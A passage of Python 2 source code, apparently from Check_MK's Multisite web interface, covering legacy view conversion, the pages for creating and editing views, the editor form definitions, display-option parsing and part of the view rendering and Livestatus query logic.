                    view['single_infos'] = ['service', 'host']
                elif 'service' in hide_filters and 'host' not in hide_filters:
                    view['single_infos'] = ['service']
                elif 'host' in hide_filters:
                    view['single_infos'] = ['host']
                elif 'hostgroup' in hide_filters:
                    view['single_infos'] = ['hostgroup']
                elif 'servicegroup' in hide_filters:
                    view['single_infos'] = ['servicegroup']
                elif 'aggr_service' in hide_filters:
                    view['single_infos'] = ['service']
                elif 'aggr_name' in hide_filters:
                    view['single_infos'] = ['aggr']
                elif 'aggr_group' in hide_filters:
                    view['single_infos'] = ['aggr_group']
                elif 'log_contact_name' in hide_filters:
                    view['single_infos'] = ['contact']
                elif 'event_host' in hide_filters:
                    view['single_infos'] = ['host']
                elif hide_filters == ['event_id', 'history_line']:
                    view['single_infos'] = ['history']
                elif 'event_id' in hide_filters:
                    view['single_infos'] = ['event']
                elif 'aggr_hosts' in hide_filters:
                    view['single_infos'] = ['host']
                else:
                    # For all other context types assume the view is showing multiple objects
                    # and the datasource can simply be gathered from the datasource
                    view['single_infos'] = []
            except: # Exceptions can happen for views saved with certain GIT versions
                if config.debug:
                    raise

        # Convert from show_filters, hide_filters, hard_filters and hard_filtervars
        # to context construct
        if 'context' not in view:
            view['show_filters'] = view['hide_filters'] + view['hard_filters'] + view['show_filters']

            single_keys = visuals.get_single_info_keys(view)

            # First get vars for the classic filters
            context = {}
            filtervars = dict(view['hard_filtervars'])
            all_vars = {}
            for filter_name in view['show_filters']:
                if filter_name in single_keys:
                    continue # skip conflictings vars / filters

                context.setdefault(filter_name, {})
                try:
                    f = visuals.get_filter(filter_name)
                except:
                    # The exact match filters have been removed. They where used only as
                    # link filters anyway - at least by the builtin views.
                    continue

                for var in f.htmlvars:
                    # Check whether or not the filter is supported by the datasource,
                    # then either skip or use the filter vars
                    if var in filtervars and f.info in datasource['infos']:
                        value = filtervars[var]
                        all_vars[var] = value
                        context[filter_name][var] = value

                # We changed different filters since the visuals-rewrite. This must be treated here, since
                # we need to transform views which have been created with the old filter var names.
                # Changes which have been made so far:
                changed_filter_vars = {
                    'serviceregex': { # Name of the filter
                        # old var name: new var name
                        'service': 'service_regex',
                    },
                    'hostregex': {
                        'host': 'host_regex',
                    },
                    'hostgroupnameregex': {
                        'hostgroup_name': 'hostgroup_regex',
                    },
                    'servicegroupnameregex': {
                        'servicegroup_name': 'servicegroup_regex',
                    },
                    'opthostgroup': {
                        'opthostgroup': 'opthost_group',
                        'neg_opthostgroup': 'neg_opthost_group',
                    },
                    'optservicegroup': {
                        'optservicegroup': 'optservice_group',
                        'neg_optservicegroup': 'neg_optservice_group',
                    },
                    'hostgroup': {
                        'hostgroup': 'host_group',
                        'neg_hostgroup': 'neg_host_group',
                    },
                    'servicegroup': {
                        'servicegroup': 'service_group',
                        'neg_servicegroup': 'neg_service_group',
                    },
                    'host_contactgroup': {
                        'host_contactgroup': 'host_contact_group',
                        'neg_host_contactgroup': 'neg_host_contact_group',
                    },
                    'service_contactgroup': {
                        'service_contactgroup': 'service_contact_group',
                        'neg_service_contactgroup': 'neg_service_contact_group',
                    },
                }

                if filter_name in changed_filter_vars and f.info in datasource['infos']:
                    for old_var, new_var in changed_filter_vars[filter_name].items():
                        if old_var in filtervars:
                            value = filtervars[old_var]
                            all_vars[new_var] = value
                            context[filter_name][new_var] = value

            # Now, when there are single object infos specified, add these keys to the
            # context
            for single_key in single_keys:
                if single_key in all_vars:
                    context[single_key] = all_vars[single_key]

            view['context'] = context

        # Cleanup unused attributes
        for k in [ 'hide_filters', 'hard_filters', 'show_filters', 'hard_filtervars' ]:
            try:
                del view[k]
            except KeyError:
                pass
def save_views(us):
    """Persist all views via the visuals module.

    NOTE(review): the `us` argument is unused but kept for caller
    compatibility.
    """
    visuals.save('views', multisite_views)
#.
# .--Table of views------------------------------------------------------.
# | _____ _ _ __ _ |
# | |_ _|_ _| |__ | | ___ ___ / _| __ _(_) _____ _____ |
# | | |/ _` | '_ \| |/ _ \ / _ \| |_ \ \ / / |/ _ \ \ /\ / / __| |
# | | | (_| | |_) | | __/ | (_) | _| \ V /| | __/\ V V /\__ \ |
# | |_|\__,_|_.__/|_|\___| \___/|_| \_/ |_|\___| \_/\_/ |___/ |
# | |
# +----------------------------------------------------------------------+
# | Show list of all views with buttons for editing |
# '----------------------------------------------------------------------'
def page_edit_views():
    """Render the 'Edit Views' overview page listing all views.

    Adds a 'Datasource' column showing each view's datasource title.
    """
    load_views()
    cols = [ (_('Datasource'), lambda v: multisite_datasources[v["datasource"]]['title']) ]
    visuals.page_list('views', _("Edit Views"), multisite_views, cols)
#.
# .--Create View---------------------------------------------------------.
# | ____ _ __ ___ |
# | / ___|_ __ ___ __ _| |_ ___ \ \ / (_) _____ __ |
# | | | | '__/ _ \/ _` | __/ _ \ \ \ / /| |/ _ \ \ /\ / / |
# | | |___| | | __/ (_| | || __/ \ V / | | __/\ V V / |
# | \____|_| \___|\__,_|\__\___| \_/ |_|\___| \_/\_/ |
# | |
# +----------------------------------------------------------------------+
# | Select the view type of the new view |
# '----------------------------------------------------------------------'
# First step: Select the data source
# Create datasource selection valuespec, also for other modules
# FIXME: Sort the datasources by (assumed) common usage
def DatasourceSelection():
    """Build the DropdownChoice valuespec for picking a view datasource."""
    # FIXME: Sort the datasources by (assumed) common usage
    choices = [(name, spec['title'])
               for name, spec in multisite_datasources.items()]

    return DropdownChoice(
        title = _('Datasource'),
        help = _('The datasources define which type of objects should be displayed with this view.'),
        choices = choices,
        sorted = True,
        columns = 1,
        default_value = 'services',
    )
def page_create_view(next_url = None):
    """First step of view creation: let the user pick a datasource.

    On submit, redirects to `next_url` (default: create_view_infos.py)
    with the chosen datasource appended as a URL variable.
    """
    vs_ds = DatasourceSelection()

    ds = 'services' # Default selection

    html.header(_('Create View'), stylesheets=["pages"])
    html.begin_context_buttons()
    back_url = html.var("back", "")
    html.context_button(_("Back"), back_url or "edit_views.py", "back")
    html.end_context_buttons()

    if html.var('save') and html.check_transaction():
        try:
            ds = vs_ds.from_html_vars('ds')
            vs_ds.validate_value(ds, 'ds')

            if not next_url:
                next_url = html.makeuri([('datasource', ds)], filename = "create_view_infos.py")
            else:
                next_url = next_url + '&datasource=%s' % ds
            html.http_redirect(next_url)
            return

        except MKUserError, e:
            # Validation failed: show the error and re-render the form.
            html.write("<div class=error>%s</div>\n" % e)
            html.add_user_error(e.varname, e)

    html.begin_form('create_view')
    html.hidden_field('mode', 'create')

    forms.header(_('Select Datasource'))
    forms.section(vs_ds.title())
    vs_ds.render_input('ds', ds)
    html.help(vs_ds.help())
    forms.end()

    html.button('save', _('Continue'), 'submit')
    html.hidden_fields()
    html.end_form()
    html.footer()
def page_create_view_infos():
    """Second step of view creation: choose the single-object infos.

    Validates the datasource chosen in step one, then delegates to the
    generic visuals creation page.
    """
    ds_name = html.var('datasource')
    if ds_name not in multisite_datasources:
        raise MKGeneralException(_('The given datasource is not supported'))

    visuals.page_create_visual('views', multisite_datasources[ds_name]['infos'],
        next_url = 'edit_view.py?mode=create&datasource=%s&single_infos=%%s' % ds_name)
#.
# .--Edit View-----------------------------------------------------------.
# | _____ _ _ _ __ ___ |
# | | ____|__| (_) |_ \ \ / (_) _____ __ |
# | | _| / _` | | __| \ \ / /| |/ _ \ \ /\ / / |
# | | |__| (_| | | |_ \ V / | | __/\ V V / |
# | |_____\__,_|_|\__| \_/ |_|\___| \_/\_/ |
# | |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
# Return list of available datasources (used to render filters)
def get_view_infos(view):
    """Return the list of infos provided by the view's datasource."""
    datasource_name = view.get('datasource', html.var('datasource'))
    datasource = multisite_datasources[datasource_name]
    return datasource['infos']
def page_edit_view():
    """Render the view editor page by delegating to the generic visuals editor.

    Wires in the view-specific handlers for rendering the config forms,
    loading/creating views from valuespec values and previewing ("try").
    """
    load_views()

    visuals.page_edit_visual('views', multisite_views,
        custom_field_handler = render_view_config,
        load_handler = transform_view_to_valuespec_value,
        create_handler = create_view_from_valuespec,
        info_handler = get_view_infos,
        try_handler = lambda view: show_view(view, False, False)
    )
def view_choices(only_with_hidden = False):
    """Return (name, title) dropdown choices for all available views.

    With only_with_hidden=True, only views pinned to a single object
    (non-empty 'single_infos') are listed. Mobile views get a title
    prefix. Always starts with an empty choice.
    """
    result = [("", "")]
    for name, view in available_views.items():
        if only_with_hidden and not view['single_infos']:
            continue
        title = _u(view["title"])
        if view.get('mobile', False):
            title = _('Mobile: ') + title
        result.append(("%s" % name, title))
    return result
def view_editor_options():
    """Checkbox options offered in the 'Options' ListChoice of the view editor."""
    return [
        ('mobile', _('Show this view in the Mobile GUI')),
        ('mustsearch', _('Show data only on search')),
        ('force_checkboxes', _('Always show the checkboxes')),
        ('user_sortable', _('Make view sortable by user')),
        ('play_sounds', _('Play alarm sounds')),
    ]
def view_editor_specs(ds_name, general_properties=True):
    """Build the (ident, valuespec) pairs that make up the view editor.

    Returns specs for the general 'view' properties (optional), the
    'columns', 'sorting' and 'grouping' sections, all restricted to
    painters/sorters supported by the datasource `ds_name`.
    """
    load_views() # make sure that available_views is present
    specs = []

    if general_properties:
        # Basic view properties: datasource (read-only), option flags,
        # reload interval and layout settings.
        specs.append(
            ('view', Dictionary(
                title = _('View Properties'),
                render = 'form',
                optional_keys = None,
                elements = [
                    ('datasource', FixedValue(ds_name,
                        title = _('Datasource'),
                        totext = multisite_datasources[ds_name]['title'],
                        help = _('The datasource of a view cannot be changed.'),
                    )),
                    ('options', ListChoice(
                        title = _('Options'),
                        choices = view_editor_options(),
                        default_value = ['user_sortable'],
                    )),
                    ('browser_reload', Integer(
                        title = _('Automatic page reload'),
                        unit = _('seconds'),
                        minvalue = 0,
                        help = _('Leave this empty or at 0 for no automatic reload.'),
                    )),
                    ('layout', DropdownChoice(
                        title = _('Basic Layout'),
                        choices = [ (k, v["title"]) for k,v in multisite_layouts.items() if not v.get("hide")],
                        default_value = 'table',
                        sorted = True,
                    )),
                    ('num_columns', Integer(
                        title = _('Number of Columns'),
                        default_value = 1,
                        minvalue = 1,
                        maxvalue = 50,
                    )),
                    ('column_headers', DropdownChoice(
                        title = _('Column Headers'),
                        choices = [
                            ("off", _("off")),
                            ("pergroup", _("once per group")),
                            ("repeat", _("repeat every 20'th row")),
                        ],
                        default_value = 'pergroup',
                    )),
                ],
            ))
        )

    # Sorters available for this datasource (used in the 'sorting' spec).
    allowed = allowed_for_datasource(multisite_sorters, ds_name)

    def column_spec(ident, title, ds_name):
        # Build the column-list spec used for both 'columns' and 'grouping'.
        allowed = allowed_for_datasource(multisite_painters, ds_name)
        collist = collist_of_collection(allowed)

        allow_empty = True
        empty_text = None
        if ident == 'columns':
            allow_empty = False
            empty_text = _("Please add at least one column to your view.")

        vs_column = Tuple(
            title = _('Column'),
            elements = [
                DropdownChoice(
                    title = _('Column'),
                    choices = collist,
                    sorted = True,
                    no_preselect = True,
                ),
                DropdownChoice(
                    title = _('Link'),
                    choices = view_choices,
                    sorted = True,
                ),
                DropdownChoice(
                    title = _('Tooltip'),
                    choices = [(None, "")] + collist,
                ),
            ]
        )

        # Datasources that support joined columns (e.g. services joined to
        # hosts) additionally offer the 5-element "Joined column" tuple.
        joined = allowed_for_joined_datasource(multisite_painters, ds_name)
        if ident == 'columns' and joined:
            joined_cols = collist_of_collection(joined, collist)

            vs_column = Alternative(
                elements = [
                    vs_column,

                    Tuple(
                        title = _('Joined column'),
                        elements = [
                            DropdownChoice(
                                title = _('Column'),
                                choices = joined_cols,
                                sorted = True,
                                no_preselect = True,
                            ),
                            TextUnicode(
                                title = _('of Service'),
                                allow_empty = False,
                            ),
                            DropdownChoice(
                                title = _('Link'),
                                choices = view_choices,
                                sorted = True,
                            ),
                            DropdownChoice(
                                title = _('Tooltip'),
                                choices = [(None, "")] + joined_cols,
                            ),
                            TextUnicode(
                                title = _('Title'),
                            ),
                        ],
                    ),
                ],
                style = 'dropdown',
                # 5-tuples are joined columns (alternative index 1),
                # plain 3-tuples are regular columns (index 0).
                match = lambda x: x != None and len(x) == 5 and 1 or 0,
            )

        return (ident, Dictionary(
            title = title,
            render = 'form',
            optional_keys = None,
            elements = [
                (ident, ListOf(vs_column,
                    title = title,
                    add_label = _('Add column'),
                    allow_empty = allow_empty,
                    empty_text = empty_text,
                )),
            ],
        ))

    specs.append(column_spec('columns', _('Columns'), ds_name))

    specs.append(
        ('sorting', Dictionary(
            title = _('Sorting'),
            render = 'form',
            optional_keys = None,
            elements = [
                ('sorters', ListOf(
                    Tuple(
                        elements = [
                            DropdownChoice(
                                title = _('Column'),
                                choices = [ (name, p["title"]) for name, p in allowed.items() ],
                                sorted = True,
                                no_preselect = True,
                            ),
                            DropdownChoice(
                                title = _('Order'),
                                choices = [(False, _("Ascending")),
                                           (True, _("Descending"))],
                            ),
                        ],
                        orientation = 'horizontal',
                    ),
                    title = _('Sorting'),
                    add_label = _('Add column'),
                )),
            ],
        )),
    )

    specs.append(column_spec('grouping', _('Grouping'), ds_name))

    return specs
def render_view_config(view, general_properties=True):
    # Render the input forms of all editor sections for this view.
    # Raises an internal error when no (or an unknown) datasource is given.
    datasource_name = view.get("datasource", html.var("datasource"))
    if not datasource_name:
        raise MKInternalError(_("No datasource defined."))
    if datasource_name not in multisite_datasources:
        raise MKInternalError(_('The given datasource is not supported.'))
    view['datasource'] = datasource_name

    for ident, valuespec in view_editor_specs(datasource_name, general_properties):
        valuespec.render_input(ident, view.get(ident))
# Is used to change the view structure to be compatible to
# the valuespec This needs to perform the inverted steps of the
# transform_valuespec_value_to_view() function. FIXME: One day we should
# rewrite this to make no transform needed anymore
def transform_view_to_valuespec_value(view):
    # Convert the flat legacy view dict into the nested structure the
    # editor valuespecs expect. This is the inverse of
    # transform_valuespec_value_to_view(). FIXME: One day we should
    # rewrite this to make no transform needed anymore.

    # A couple of global settings are grouped below the "view" key.
    # Only copy our known keys; reporting elements etc. might have their
    # own keys as well.
    view["view"] = {}
    for key in ("datasource", "browser_reload", "layout", "num_columns", "column_headers"):
        if key in view:
            view["view"][key] = view[key]

    # Boolean view options become a list of the enabled option names
    view["view"]['options'] = [key for key, title in view_editor_options()
                               if view.get(key)]

    view['visibility'] = [key for key in ('hidden', 'hidebutton', 'public')
                          if view.get(key)]

    view['grouping'] = { "grouping" : view.get('group_painters', []) }
    view['sorting'] = { "sorters" : view.get('sorters', {}) }

    # Reorder the painter tuples into the column order of the valuespec
    # and pad shorter legacy entries with empty link/tooltip/title parts
    columns = []
    view['columns'] = { "columns" : columns }
    for entry in view.get('painters', []):
        if len(entry) == 5:
            pname, viewname, tooltip, join_index, col_title = entry
            columns.append((pname, join_index, viewname, tooltip, col_title))
        elif len(entry) == 4:
            pname, viewname, tooltip, join_index = entry
            columns.append((pname, join_index, viewname, tooltip, ''))
        elif len(entry) == 3:
            pname, viewname, tooltip = entry
            columns.append((pname, viewname, tooltip))
        else:
            pname, viewname = entry
            columns.append((pname, viewname, ''))
def transform_valuespec_value_to_view(view):
    """Convert the editor valuespec structure back into the legacy view
    dict format (inverse of transform_view_to_valuespec_value()).

    "view" is modified in place: the nested editor sections ("view",
    "sorting", "grouping", "columns") are unpacked into the flat legacy
    keys and the section keys themselves are removed.
    """
    # Iterate over a snapshot of the items: the loop body deletes keys
    # from (and adds keys to) "view" itself. Mutating a dict while
    # iterating its live view is fragile and raises a RuntimeError on
    # modern Python versions.
    for ident, attrs in list(view.items()):
        # Transform some valuespec specific options to legacy view
        # format. We do not want to change the view data structure
        # at the moment.
        if ident == 'view':
            if "options" in attrs:
                # First set all options to false
                for option in dict(view_editor_options()).keys():
                    view[option] = False

                # Then set the selected single options
                for option in attrs['options']:
                    view[option] = True

                # And cleanup
                del attrs['options']

            view.update(attrs)
            del view["view"]

        elif ident == 'sorting':
            view.update(attrs)
            del view["sorting"]

        elif ident == 'grouping':
            view['group_painters'] = attrs['grouping']
            del view["grouping"]

        elif ident == 'columns':
            painters = []
            for column in attrs['columns']:
                if len(column) == 5:
                    pname, join_index, viewname, tooltip, col_title = column
                else:
                    pname, viewname, tooltip = column
                    join_index, col_title = None, None

                # An empty link target is stored as None
                viewname = viewname and viewname or None

                # Join columns carry the join index and (optionally) a
                # custom column title in addition
                if join_index and col_title:
                    painters.append((pname, viewname, tooltip, join_index, col_title))
                elif join_index:
                    painters.append((pname, viewname, tooltip, join_index))
                else:
                    painters.append((pname, viewname, tooltip))
            view['painters'] = painters
            del view["columns"]
# Extract properties of view from HTML variables and construct
# view object, to be used for saving or displaying
#
# old_view is the old view dict which might be loaded from storage.
# view is the new dict object to be updated.
def create_view_from_valuespec(old_view, view):
    # Read the editor forms from the HTML variables, validate them and
    # merge the (transformed) result into "view", which is returned.
    # "old_view" is the previously stored view definition; "view" is the
    # new dict object being filled.
    datasource_name = old_view.get('datasource', html.var('datasource'))
    view['datasource'] = datasource_name

    parsed_sections = {}
    for ident, valuespec in view_editor_specs(datasource_name):
        section = valuespec.from_html_vars(ident)
        valuespec.validate_value(section, ident)
        parsed_sections[ident] = section

    transform_valuespec_value_to_view(parsed_sections)
    view.update(parsed_sections)
    return view
#.
# .--Display View--------------------------------------------------------.
# | ____ _ _ __ ___ |
# | | _ \(_)___ _ __ | | __ _ _ _ \ \ / (_) _____ __ |
# | | | | | / __| '_ \| |/ _` | | | | \ \ / /| |/ _ \ \ /\ / / |
# | | |_| | \__ \ |_) | | (_| | |_| | \ V / | | __/\ V V / |
# | |____/|_|___/ .__/|_|\__,_|\__, | \_/ |_|\___| \_/\_/ |
# | |_| |___/ |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
def show_filter(f):
    # Render a single filter. Invisible filters are still emitted (so
    # their HTML variables stay part of the form) but wrapped in a
    # hidden container.
    if f.visible():
        visuals.show_filter(f)
    else:
        html.write('<div style="display:none">')
        f.display()
        html.write('</div>')
def show_filter_form(is_open, filters):
    # Render the filter form of a view. It may start hidden and is then
    # toggled via the "filters" context button.
    # Note: the table needs a name different from the form itself.
    html.write('<div class="view_form" id="filters" %s>'
            % (not is_open and 'style="display: none"' or '') )

    html.begin_form("filter")
    html.write("<table border=0 cellspacing=0 cellpadding=0 class=filterform><tr><td>")

    # Show only the available filters, ordered by their title
    ordered = [(f.sort_index, f.title, f) for f in filters if f.available()]
    ordered.sort()

    # Render the double height filters first (for a better floating
    # layout), then the single height ones
    for sort_index, title, flt in ordered:
        if flt.double_height():
            show_filter(flt)
    for sort_index, title, flt in ordered:
        if not flt.double_height():
            show_filter(flt)

    html.write("</td></tr><tr><td>")
    html.button("search", _("Search"), "submit")
    html.write("</td></tr></table>")

    html.hidden_fields()
    html.end_form()
    html.write("</div>")
def show_painter_options(painter_options):
    # Render the (initially hidden) form containing all painter options
    # registered for the current view.
    html.write('<div class="view_form" id="painteroptions" style="display: none">')
    html.begin_form("painteroptions")
    forms.header(_("Display Options"))
    for option_name in painter_options:
        valuespec = multisite_painter_options[option_name]['valuespec']
        forms.section(valuespec.title())
        valuespec.render_input('po_' + option_name, get_painter_option(option_name))
    forms.end()

    html.button("painter_options", _("Submit"), "submit")

    html.hidden_fields()
    html.end_form()
    html.write('</div>')
def page_view():
    # Page entry point: look up the requested view by name and render it
    # as a full page (heading, buttons and footer included).
    bi.reset_cache_status() # needed for status icon

    load_views()
    view_name = html.var("view_name")
    if view_name is None:
        raise MKGeneralException(_("Missing the variable view_name in the URL."))

    view = available_views.get(view_name)
    if not view:
        raise MKGeneralException(_("No view defined with the name '%s'.") % html.attrencode(view_name))

    # Gather the page context which is needed for the "add to visual" popup menu
    # to add e.g. views to dashboards or reports
    datasource = multisite_datasources[view['datasource']]
    page_context = visuals.get_context_from_uri_vars(datasource['infos'])
    page_context.update(visuals.get_singlecontext_html_vars(view))
    html.set_page_context(page_context)

    show_view(view, True, True, True)
# Get a list of columns we need to fetch in order to
# render a given list of painters. If join_columns is True,
# then we only return the list needed by "Join" columns, i.e.
# columns that need to fetch information from another table
# (e.g. from the services table while we are in a hosts view)
# If join_columns is False, we only return the "normal" columns.
def get_needed_columns(view, painters):
    # Compute the livestatus columns that must be fetched to render the
    # given painter entries: the painters' own columns, the link columns
    # of filters of linked views, and the columns of tooltip painters.

    # Make sure that the information about the available views is
    # present. If called via the reporting, this might not be the case.
    views = permitted_views()

    columns = []
    for entry in painters:
        painter, linkview_name = entry[0], entry[1]
        columns.extend(get_painter_columns(painter))

        if linkview_name:
            linkview = views.get(linkview_name)
            if linkview:
                # The filters of the linked view need their own columns
                for filter_name in visuals.get_single_info_keys(linkview):
                    columns.extend(visuals.get_filter(filter_name).link_columns)

        tooltip_name = len(entry) > 2 and entry[2] or None
        if tooltip_name:
            columns.extend(get_painter_columns(multisite_painters[tooltip_name]))

    return columns
def get_painter_columns(painter):
    """Return the list of livestatus columns a painter needs.

    The "columns" attribute of a painter may either be a static list or
    a callable computing the columns dynamically. The previous check
    (type(lambda: None) == type(...)) only recognized plain functions;
    callable() also covers bound methods, partials and other callables
    while behaving identically for plain lists.
    """
    columns = painter["columns"]
    if callable(columns):
        return columns()
    return columns
# Display options are flags that control which elements of a
# view should be displayed (buttons, sorting, etc.). They can be
# specified via the URL variable display_options. The function
# extracts this variable, applies defaults and generates
# three versions of the display options:
# Return value -> display options to actually use
# html.display_options -> display options to use in for URLs to other views
# html.title_display_options -> display options for title sorter links
def prepare_display_options():
    """Parse the "display_options" URL variable and apply defaults.

    Produces three variants of the options:
      return value               -> options to actually use for rendering
      html.display_options       -> options to use in URLs to other views
      html.title_display_options -> options for title sorter links
    """
    # Display options (upper-case: show, lower-case: don't show)
    # H  The HTML header and body-tag (containing the tags <HTML> and <BODY>)
    # T  The title line showing the header and the logged in user
    # B  The blue context buttons that link to other views
    # F  The button for using filters
    # C  The button for using commands and all icons for commands (e.g. the reschedule icon)
    # O  The view options number of columns and refresh
    # D  The Display button, which contains column specific formatting settings
    # E  The button for editing the view
    # Z  The footer line, where refresh: 30s is being displayed
    # R  The auto-refreshing in general (browser reload)
    # S  The playing of alarm sounds (on critical and warning services)
    # U  Load persisted user row selections
    # I  All hyperlinks pointing to other views
    # X  All other hyperlinks (pointing to external applications like PNP, WATO or others)
    # M  If this option is not set, then all hyperlinks are targeted to the HTML frame
    #    with the name main. This is useful when using views as elements in the dashboard.
    # L  The column title links in multisite views
    # W  The limit and livestatus error message in views
    all_display_options = "HTBFCEOZRSUIXDMLW"

    # Parse display options and
    if html.output_format == "html":
        display_options = html.var("display_options", "")
    else:
        # Non-HTML output (export formats) disables all options
        display_options = all_display_options.lower()

    # If all display_options are upper case assume all not given values default
    # to lower-case. Vice versa when all display_options are lower case.
    # When the display_options are mixed case assume all unset options to be enabled
    def apply_display_option_defaults(opts):
        do_defaults = opts.isupper() and all_display_options.lower() or all_display_options
        for c in do_defaults:
            if c.lower() not in opts.lower():
                opts += c
        return opts

    display_options = apply_display_option_defaults(display_options)
    # Add the display_options to the html object for later linking etc.
    html.display_options = display_options

    # This is needed for letting only the data table reload. The problem is that
    # the data table is re-fetched via javascript call using special display_options
    # but these special display_options must not be used in links etc. So we use
    # a special var _display_options for defining the display_options for rendering
    # the data table to be reloaded. The contents of "display_options" are used for
    # linking to other views.
    if html.has_var('_display_options'):
        display_options = html.var("_display_options", "")
        display_options = apply_display_option_defaults(display_options)
        html.display_options = display_options

    # But there is one special case: The sorter links! These links need to know
    # about the provided display_option parameter. The links could use
    # "html.display_options" but this contains the implicit options which should
    # not be added to the URLs. So the real parameters need to be preserved for
    # this case. It is stored in the var "html.display_options"
    if html.var('display_options'):
        html.title_display_options = html.var("display_options")

    # If display option 'M' is set, then all links are targetet to the 'main'
    # frame. Also the display options are removed since the view in the main
    # frame should be displayed in standard mode.
    if 'M' not in display_options:
        html.set_link_target("main")
        html.del_var("display_options")

    # Below we have the following display_options vars:
    # html.display_options        - Use this when rendering the current view
    # html.var("display_options") - Use this for linking to other views
    return display_options
# Display view with real data. This is *the* function everying
# is about.
def show_view(view, show_heading = False, show_buttons = True,
              show_footer = True, render_function = None, only_count=False,
              all_filters_active=False, limit=None):
    """Display a view with real data. This is *the* central function.

    Fetches the rows from livestatus (honoring filters, sorting, limits
    and joins), then hands rendering off to render_function (defaults to
    render_view; the mobile GUI passes its own).

    When only_count is True no rendering happens and the number of
    matching rows is returned instead.
    """
    display_options = prepare_display_options()

    # User can override the layout settings via HTML variables (buttons)
    # which are safed persistently. This is known as "view options". Note: a few
    # can be anonymous (e.g. when embedded into a report). In that case there
    # are no display options.
    if "name" in view:
        vo = view_options(view["name"])
    else:
        vo = {}
    num_columns = vo.get("num_columns", view.get("num_columns", 1))
    browser_reload = vo.get("refresh", view.get("browser_reload", None))

    force_checkboxes = view.get("force_checkboxes", False)
    show_checkboxes = force_checkboxes or html.var('show_checkboxes', '0') == '1'

    # Get the datasource (i.e. the logical table)
    datasource = multisite_datasources[view["datasource"]]
    tablename = datasource["table"]

    # Filters to use in the view
    # In case of single object views, the needed filters are fixed, but not always present
    # in context. In this case, take them from the context type definition.
    use_filters = visuals.filters_of_visual(view, datasource['infos'],
                              all_filters_active, datasource.get('link_filters', {}))

    # Not all filters are really shown later in show_filter_form(), because filters which
    # have a hardcoded value are not changeable by the user
    show_filters = visuals.visible_filters_of_visual(view, use_filters)

    # FIXME TODO HACK to make grouping single contextes possible on host/service infos
    # Is hopefully cleaned up soon.
    if view['datasource'] in ['hosts', 'services']:
        if html.has_var('hostgroup') and not html.has_var("opthost_group"):
            html.set_var("opthost_group", html.var("hostgroup"))
        if html.has_var('servicegroup') and not html.has_var("optservice_group"):
            html.set_var("optservice_group", html.var("servicegroup"))

    # Now populate the HTML vars with context vars from the view definition. Hard
    # coded default values are treated differently:
    #
    # a) single context vars of the view are enforced
    # b) multi context vars can be overwritten by existing HTML vars
    visuals.add_context_to_uri_vars(view, datasource["infos"], only_count)

    # Check that all needed information for configured single contexts are available
    visuals.verify_single_contexts('views', view, datasource.get('link_filters', {}))

    # Af any painter, sorter or filter needs the information about the host's
    # inventory, then we load it and attach it as column "host_inventory"
    need_inventory_data = False

    # Prepare Filter headers for Livestatus
    # TODO: When this is used by the reporting then *all* filters are
    # active. That way the inventory data will always be loaded. When
    # we convert this to the visuals principle the we need to optimize
    # this.
    filterheaders = ""
    all_active_filters = [ f for f in use_filters if f.available() ]
    for filt in all_active_filters:
        header = filt.filter(tablename)
        filterheaders += header
        if filt.need_inventory():
            need_inventory_data = True

    # Apply the site hint / filter
    if html.var("site"):
        only_sites = [html.var("site")]
    else:
        only_sites = None

    # Prepare limit:
    # We had a problem with stats queries on the logtable where
    # the limit was not applied on the resulting rows but on the
    # lines of the log processed. This resulted in wrong stats.
    # For these datasources we ignore the query limits.
    if limit == None: # Otherwise: specified as argument
        if not datasource.get('ignore_limit', False):
            limit = get_limit()

    # Fork to availability view. We just need the filter headers, since we do not query the normal
    # hosts and service table, but "statehist". This is *not* true for BI availability, though (see later)
    if html.var("mode") == "availability" and (
          "aggr" not in datasource["infos"] or html.var("timeline_aggr")):
        return render_availability_page(view, datasource, filterheaders, display_options, only_sites, limit)

    query = filterheaders + view.get("add_headers", "")

    # Sorting - use view sorters and URL supplied sorters
    if not only_count:
        sorter_list = html.has_var('sort') and parse_url_sorters(html.var('sort')) or view["sorters"]
        sorters = [ (multisite_sorters[s[0]],) + s[1:] for s in sorter_list
                    if s[0] in multisite_sorters ]
    else:
        sorters = []

    # Prepare grouping information
    group_painters = [ (multisite_painters[e[0]],) + e[1:] for e in view["group_painters"]
                       if e[0] in multisite_painters ]

    # Prepare columns to paint
    painters = [ (multisite_painters[e[0]],) + e[1:] for e in view["painters"]
                 if e[0] in multisite_painters ]

    # Now compute the list of all columns we need to query via Livestatus.
    # Those are: (1) columns used by the sorters in use, (2) columns use by
    # column- and group-painters in use and - note - (3) columns used to
    # satisfy external references (filters) of views we link to. The last bit
    # is the trickiest. Also compute this list of view options use by the
    # painters
    all_painters = group_painters + painters
    join_painters = [ p for p in all_painters if len(p) >= 4 ]
    master_painters = [ p for p in all_painters if len(p) < 4 ]
    columns = get_needed_columns(view, master_painters)
    join_columns = get_needed_columns(view, join_painters)

    # Inventory data needed in any of the tool tips
    for painter in master_painters:
        if len(painter) > 2:
            tooltip_painter_name = painter[2]
            if tooltip_painter_name and tooltip_painter_name.startswith("inv_"):
                need_inventory_data = True

    # Columns needed for sorters
    for s in sorters:
        if len(s) == 2:
            columns += s[0]["columns"]
        else:
            join_columns += s[0]["columns"]
        if s[0].get("load_inv"):
            need_inventory_data = True

    # Add key columns, needed for executing commands
    columns += datasource["keys"]

    # Add idkey columns, needed for identifying the row
    columns += datasource["idkeys"]

    # BI availability needs aggr_tree
    if html.var("mode") == "availability" and "aggr" in datasource["infos"]:
        columns = [ "aggr_tree", "aggr_name", "aggr_group" ]

    # Make column list unique and remove (implicit) site column
    colset = set(columns)
    if "site" in colset:
        colset.remove("site")
    columns = list(colset)

    # Get list of painter options we need to display (such as PNP time range
    # or the format being used for timestamp display)
    painter_options = []
    for entry in all_painters:
        p = entry[0]
        painter_options += p.get("options", [])
        if p.get("load_inv"):
            need_inventory_data = True

    # Also layouts can register painter options
    if "layout" in view:
        painter_options += multisite_layouts[view["layout"]].get("options", [])

    painter_options = list(set(painter_options))
    painter_options.sort()

    # Fetch data. Some views show data only after pressing [Search]
    if (only_count or (not view.get("mustsearch")) or html.var("filled_in") in ["filter", 'actions', 'confirm', 'painteroptions']):
        # names for additional columns (through Stats: headers)
        add_columns = datasource.get("add_columns", [])

        # tablename may be a function instead of a livestatus tablename
        # In that case that function is used to compute the result.
        if type(tablename) == type(lambda x:None):
            rows = tablename(columns, query, only_sites, limit, all_active_filters)
        else:
            rows = query_data(datasource, columns, add_columns, query, only_sites, limit)

        # Now add join information, if there are join columns
